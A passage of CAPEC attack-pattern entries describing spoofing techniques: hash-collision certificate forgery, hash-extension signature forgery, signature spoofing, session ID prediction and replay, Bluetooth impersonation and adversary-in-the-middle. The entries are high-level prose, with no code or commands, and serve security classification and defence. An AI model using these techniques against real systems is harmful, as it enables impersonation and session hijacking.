An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.
CAPEC-461: Web Services API Signature Forgery Leveraging Hash Function Extension Weakness
An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.
CAPEC-473: Signature Spoof
An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.
CAPEC-476: Signature Spoofing by Misrepresentation
An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
CAPEC-60: Reusing Session IDs (aka Session Replay)
This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.
CAPEC-667: Bluetooth Impersonation AttackS (BIAS)
An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.
CAPEC-94: Adversary in the Middle (AiTM)
An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.